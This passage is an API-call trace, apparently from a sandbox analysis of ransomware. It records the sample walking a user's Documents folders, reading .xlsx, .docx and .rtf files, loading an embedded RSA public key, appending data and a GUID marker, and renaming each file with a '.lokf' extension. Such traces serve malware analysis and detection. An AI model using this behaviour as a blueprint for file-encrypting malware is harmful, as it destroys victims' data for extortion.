dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.349] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.349] CloseHandle (hObject=0x5cc) returned 1 [0060.350] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q6NKNt7D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q6nknt7d.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q6NKNt7D.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q6nknt7d.xlsx.lokf")) returned 1 [0060.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.351] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.352] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276ee7b0, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xd5800220, ftLastAccessTime.dwHighDateTime=0x1d4d42d, ftLastWriteTime.dwLowDateTime=0xd5800220, ftLastWriteTime.dwHighDateTime=0x1d4d42d, nFileSizeHigh=0x0, nFileSizeLow=0x9816, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q6NKNt7D.xlsx", cAlternateFileName="Q6NKNT~1.XLS")) returned 0 [0060.352] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.352] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.352] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\") returned="pW62l8V1WmQv\\" [0060.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0060.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0060.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.352] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.352] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.352] PathFindFileNameW (pszPath="") returned="" [0060.353] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0xb4c43010, ftLastAccessTime.dwHighDateTime=0x1d4c906, ftLastWriteTime.dwLowDateTime=0xb4c43010, ftLastWriteTime.dwHighDateTime=0x1d4c906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32add78 | out: hHeap=0x660000) returned 1 [0060.353] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0xb4c43010, ftLastAccessTime.dwHighDateTime=0x1d4c906, ftLastWriteTime.dwLowDateTime=0xb4c43010, ftLastWriteTime.dwHighDateTime=0x1d4c906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.353] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2045210, ftCreationTime.dwHighDateTime=0x1d4ca52, ftLastAccessTime.dwLowDateTime=0x62434650, ftLastAccessTime.dwHighDateTime=0x1d4cbcc, ftLastWriteTime.dwLowDateTime=0x62434650, ftLastWriteTime.dwHighDateTime=0x1d4cbcc, nFileSizeHigh=0x0, nFileSizeLow=0xea99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Bi8C_q4pStHzT.docx", cAlternateFileName="7BI8C_~1.DOC")) returned 1 [0060.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\7Bi8C_q4pStHzT.docx") returned=".docx" [0060.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\7Bi8C_q4pStHzT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\7bi8c_q4psthzt.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.353] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=60057) returned 1 [0060.353] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.355] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xea73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.355] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.356] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xea99, lpOverlapped=0x0) returned 1 [0060.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.357] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.357] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.357] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.357] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.357] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.357] GetLastError () returned 0x0 [0060.357] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.357] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.357] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.358] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.358] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeaa0) returned 0x9c8bae8 [0060.358] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89130 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d10 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89178 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d28 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d58 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d70 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.358] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d58 | out: hHeap=0x660000) returned 1 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d70 | out: hHeap=0x660000) returned 1 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d70 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85d58 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d70 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d58 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.359] GetCurrentThreadId () returned 0x9e0 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a6d0 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.360] GetCurrentThreadId () returned 0x9e0 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d58 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d70 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d40 [0060.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d88 [0060.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.363] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xea99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.363] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.363] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.363] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.364] CloseHandle (hObject=0x5cc) returned 1 [0060.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.365] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\7Bi8C_q4pStHzT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\7bi8c_q4psthzt.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\7Bi8C_q4pStHzT.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\7bi8c_q4psthzt.docx.lokf")) returned 1 [0060.366] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7eb8390, ftCreationTime.dwHighDateTime=0x1d4d060, ftLastAccessTime.dwLowDateTime=0x1bb03c90, ftLastAccessTime.dwHighDateTime=0x1d4d494, ftLastWriteTime.dwLowDateTime=0x1bb03c90, ftLastWriteTime.dwHighDateTime=0x1d4d494, nFileSizeHigh=0x0, nFileSizeLow=0x13e76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E8XcFurbwLsj.rtf", cAlternateFileName="E8XCFU~1.RTF")) returned 1 [0060.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0060.366] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\E8XcFurbwLsj.rtf") returned=".rtf" [0060.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\E8XcFurbwLsj.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\e8xcfurbwlsj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.366] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=81526) returned 1 [0060.366] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.368] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13e50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.369] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.369] 